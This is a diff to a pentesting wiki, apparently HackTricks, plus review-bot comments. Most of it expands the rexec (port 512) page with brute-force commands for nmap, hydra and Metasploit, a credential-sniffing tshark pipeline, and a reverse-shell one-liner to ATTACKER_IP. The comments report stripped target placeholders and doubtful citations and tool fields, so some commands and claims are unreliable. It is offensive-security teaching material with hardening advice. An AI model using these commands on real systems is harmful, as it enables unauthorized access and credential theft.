diff --git a/src/generic-methodologies-and-resources/pentesting-wifi/enable-nexmon-monitor-and-injection-on-android.md b/src/generic-methodologies-and-resources/pentesting-wifi/enable-nexmon-monitor-and-injection-on-android.md index 2ee072b1270..9c74b3b41fa 100644 --- a/src/generic-methodologies-and-resources/pentesting-wifi/enable-nexmon-monitor-and-injection-on-android.md +++ b/src/generic-methodologies-and-resources/pentesting-wifi/enable-nexmon-monitor-and-injection-on-android.md @@ -22,7 +22,7 @@ The same technique applies to any handset that has a publicly available NexMon p * NexMon Magisk ZIP or self-compiled patch providing: * `/system/lib*/libnexmon.so` * `/system/xbin/nexutil` -* Hijacker ≥ 1.7 (arm/arm64) – https://github.com/chrisk44/Hijacker +* Hijacker ≥ 1.7 (arm/arm64) – [https://github.com/chrisk44/Hijacker](https://github.com/chrisk44/Hijacker) * (Optional) Kali NetHunter or any Linux chroot where you intend to run wireless tools --- @@ -130,4 +130,4 @@ Performance on the Galaxy S10 is comparable to external USB NICs (~20 dBm TX, 2- * [NexMon – firmware patching framework](https://github.com/seemoo-lab/nexmon) * [Hijacker (aircrack-ng GUI for Android)](https://github.com/chrisk44/Hijacker) -{{#include ../../banners/hacktricks-training.md}} \ No newline at end of file +{{#include ../../banners/hacktricks-training.md}} diff --git a/src/mobile-pentesting/ios-pentesting/ios-pentesting-without-jailbreak.md b/src/mobile-pentesting/ios-pentesting/ios-pentesting-without-jailbreak.md index 791da2761f0..1f226fae017 100644 --- a/src/mobile-pentesting/ios-pentesting/ios-pentesting-without-jailbreak.md +++ b/src/mobile-pentesting/ios-pentesting/ios-pentesting-without-jailbreak.md 
@@ -106,7 +106,7 @@ Recent Frida releases (>=16) automatically handle pointer authentication and oth ### Automated dynamic analysis with MobSF (no jailbreak) -[MobSF](https://mobsf.github.io/Mobile-Security-Framework-MobSF/) can instrument a dev-signed IPA on a real device using the same technique (`get_task_allow`) and provides a web UI with filesystem browser, traffic capture and Frida console【†L2-L3】. The quickest way is to run MobSF in Docker and then plug your iPhone via USB: +[MobSF](https://mobsf.github.io/Mobile-Security-Framework-MobSF/) can instrument a dev-signed IPA on a real device using the same technique (`get_task_allow`) and provides a web UI with filesystem browser, traffic capture and Frida console【】. The quickest way is to run MobSF in Docker and then plug your iPhone via USB: ```bash docker pull opensecurity/mobile-security-framework-mobsf:latest diff --git a/src/network-services-pentesting/512-pentesting-rexec.md b/src/network-services-pentesting/512-pentesting-rexec.md index 4eb74ab92c6..e264e83e0c2 100644 --- a/src/network-services-pentesting/512-pentesting-rexec.md +++ b/src/network-services-pentesting/512-pentesting-rexec.md 
@@ -2,22 +2,115 @@ {{#include ../banners/hacktricks-training.md}} - ## Basic Information -It is a service that **allows you to execute a command inside a host** if you know valid **credentials** (username and password). +Rexec (remote **exec**) is one of the original Berkeley *r*-services suite (together with `rlogin`, `rsh`, …). It provides a **remote command-execution** capability **authenticated only with a clear-text username and password**. The protocol was defined in the early 1980’s (see RFC 1060) and is nowadays considered **insecure by design**. Nevertheless it is still enabled by default in some legacy UNIX / network-attached equipment and occasionally shows up during internal pentests. -**Default Port:** 512 +**Default Port:** TCP 512 (`exec`) ``` PORT STATE SERVICE 512/tcp open exec ``` +> 🔥 All traffic – including credentials – is transmitted **unencrypted**. Anyone with the ability to sniff the network can recover the username, password and command. + +### Protocol quick-look + +1. Client connects to TCP 512. +2. Client sends three **NUL-terminated** strings: + * the port number (as ASCII) where it wishes to receive stdout/stderr (often `0`), + * the **username**, + * the **password**. +3. A final NUL-terminated string with the **command** to execute is sent. +4. The server replies with a single 8-bit status byte (0 = success, `1` = failure) followed by the command output. + +That means you can reproduce the exchange with nothing more than `echo -e` and `nc`: + +```bash +(echo -ne "0\0user\0password\0id\0"; cat) | nc 512 +``` + +If the credentials are valid you will receive the output of `id` straight back on the same connection. + +### Manual usage with the client + +Many Linux distributions still ship the legacy client inside the **inetutils-rexec** / **rsh-client** package: + +```bash +rexec -l user -p password "uname -a" +``` + +If `-p` is omitted the client will prompt interactively for the password (visible on the wire in clear-text!). 
+ +--- +## Enumeration & Brute-forcing + ### [**Brute-force**](../generic-hacking/brute-force.md#rexec) +### Nmap -{{#include ../banners/hacktricks-training.md}} +```bash +nmap -p 512 --script rexec-info +# Discover service banner and test for stdout port mis-configuration + +nmap -p 512 --script rexec-brute --script-args "userdb=users.txt,passdb=rockyou.txt" +``` +The `rexec-brute` NSE uses the protocol described above to try credentials very quickly . +### Hydra / Medusa / Ncrack +```bash +hydra -L users.txt -P passwords.txt rexec:// -s 512 -t 8 +``` +`hydra` has a dedicated **rexec** module and remains the fastest offline bruteforcer . `medusa` (`-M REXEC`) and `ncrack` (`rexec` module) can be used in the same way. +### Metasploit + +``` +use auxiliary/scanner/rservices/rexec_login +set RHOSTS +set USER_FILE users.txt +set PASS_FILE passwords.txt +run +``` +The module will spawn a shell on success and store the credentials in the database . + +--- +## Sniffing credentials + +Because everything is clear-text, **network captures are priceless**. With a copy of the traffic you can extract creds without touching the target: + +```bash +tshark -r traffic.pcap -Y 'tcp.port == 512' -T fields -e data.decoded | \ + awk -F"\\0" '{print $2":"$3" -> "$4}' # username:password -> command +``` + +(In Wireshark enable *Decode As …​* TCP 512 → REXEC to view nicely-parsed fields.) + +--- +## Post-Exploitation tips + +* Commands run with the privileges of the supplied user. If `/etc/pam.d/rexec` is mis-configured (e.g. `pam_rootok`), root shells are sometimes possible. +* Rexec ignores the user’s shell and executes the command via `/bin/sh -c `. 
You can therefore use typical shell-escape tricks (`;`, ``$( )``, backticks) to chain multiple commands or spawn reverse shells: + ```bash + rexec -l user -p pass 'bash -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"' + ``` +* Passwords are often stored in **~/.netrc** on other systems; if you compromise one host you may reuse them for lateral movement. + +--- +## Hardening / Detection + +* **Do not expose rexec**; replace it with SSH. Virtually all modern *inetd* superservers comment the service out by default. +* If you must keep it, restrict access with TCP wrappers (`/etc/hosts.allow`) or firewall rules and enforce strong per-account passwords. +* Monitor for traffic to :512 and for `rexecd` process launches. A single packet capture is enough to detect a compromise. +* Disable `rexec`, `rlogin`, `rsh` together – they share most of the same codebase and weaknesses. + +--- + + +## References + +* Nmap NSE `rexec-brute` documentation – [https://nmap.org/nsedoc/scripts/rexec-brute.html](https://nmap.org/nsedoc/scripts/rexec-brute.html) +* Rapid7 Metasploit module `auxiliary/scanner/rservices/rexec_login` – [https://www.rapid7.com/db/modules/auxiliary/scanner/rservices/rexec_login](https://www.rapid7.com/db/modules/auxiliary/scanner/rservices/rexec_login) +{{#include ../banners/hacktricks-training.md}} diff --git a/src/network-services-pentesting/pentesting-telnet.md b/src/network-services-pentesting/pentesting-telnet.md index 31ca7a6ae15..5eb9580d6e3 100644 --- a/src/network-services-pentesting/pentesting-telnet.md +++ b/src/network-services-pentesting/pentesting-telnet.md @@ -139,4 +139,4 @@ After a shell is obtained remember that **TTYs are usually dumb**; upgrade with -{{#include /banners/hacktricks-training.md}} +{{#include ../banners/hacktricks-training.md}}
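Review bot: in the ios-pentesting-without-jailbreak.md hunk, the MobSF sentence swaps the broken citation marker `【†L2-L3】` for an empty `【】`, which still renders as a stray bracket pair after "Frida console". Either drop the marker entirely or replace it with a normal markdown link to the MobSF documentation that supports the claim, so nothing of the original scraping artifact survives.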
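Review bot: in the new 512-pentesting-rexec.md hunk every angle-bracket placeholder appears to have been stripped, so most of the added commands cannot be run as shown: `(echo -ne "0\0user\0password\0id\0"; cat) | nc 512`, `hydra -L users.txt -P passwords.txt rexec:// -s 512 -t 8` and `set RHOSTS` all lack the target, and the same happened to the `rexec`/`nmap` invocations and the prose fragments `/bin/sh -c ` and `traffic to :512`. Restore `<IP>` / `<command>` inside the code fences and escape or backtick them in prose so the markdown renderer does not swallow them again. A few smaller points in the same hunk: the text says the protocol was "defined in the early 1980's (see RFC 1060)", but RFC 1060 is the 1990 Assigned Numbers document that only lists port 512, so the BSD rexecd(8) man page is the right reference; `--script rexec-info` is neither in the References list (only `rexec-brute` is) nor a script I can find in the NSE index, so confirm it exists or remove it; `hydra` is an online brute-forcer, not "offline"; the sentences ending "very quickly .", "bruteforcer ." and "in the database ." carry a space before the period where a citation marker was removed; and the tshark pipeline uses `-e data.decoded`, which I cannot find among the data dissector fields (`data.data` and `data.text` are the ones I know), while `awk -F"\\0"` does not split on NUL in every awk implementation, so please run that pipeline against a real capture before merging.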